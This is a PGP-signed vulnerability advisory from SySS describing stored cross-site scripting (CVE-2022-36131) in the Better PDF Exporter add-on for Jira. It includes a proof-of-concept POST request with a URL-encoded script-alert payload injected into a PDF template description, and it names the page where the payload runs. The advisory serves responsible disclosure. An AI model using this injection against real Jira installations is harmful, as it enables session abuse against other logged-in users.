-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2022-038 Product: Better PDF Exporter for Jira Manufacturer: Midori Global Consulting Kft. Affected Version(s): 10.0.0 Tested Version(s): 9.6.0 Vulnerability Type: Stored Cross-Site Scripting (CWE-79) Risk Level: Low Solution Status: Open Manufacturer Notification: 2022-05-27 Solution Date: - Public Disclosure: 2022-07-22 CVE Reference: CVE-2022-36131 Author of Advisory: Lukas Faiß, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Better PDF Exporter is an add-on for Jira to export Jira artifacts to PDF files. The manufacturer describes the product as follows (see [1]): "Better PDF Exporter exports Jira issues to PDF documents to share, print, email, archive and report issues in the standard business document file format." Due to insufficient input validation of user-provided input, Better PDF Exporter is vulnerable to cross-site scripting attacks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The 'PDF Templates' overview is prone to a stored cross-site scripting attack. XSS vulnerabilities allow an attacker to embed malicious JavaScript code into server replies which is later executed in the web browsers of other users. By executing JavaScript, attackers can, for example, perform actions in the context of other logged-in users. For testing purposes, the add-on of the manufacturer[1] was used in a local Jira Server[4] installation. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The 'PDF Template' view in the administration back end can be exploited for an attack. After entering the attack vector "" in the description field of a PDF template, the following request is sent to the server: POST /rest/com.midori.jira.plugin.pdfview/1.0/pdf-resource/30 HTTP/2 Host: [REDACTED] Cookie: Content-Length: 153 Sec-Ch-Ua:"Not A;Brand";v="99","Google Chrome";v="101" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Sec-Ch-Ua-Platform: "Linux" Origin: [REDACTED] Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: [REDACTED]/secure/update-pdf-resource.jspa?id=30 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 name=Pentest.pdf&description=%3cscript%3ealert('SySS_PXSS_PoC')%3b%3c %2fscript%3e&content=content By calling the 'PDF Template' overview page through the URL "https://[REDACTED]/secure/pdf-resources.jspa", the payload is loaded and executed. The payload is listed in the following response: ... Pentest.pdf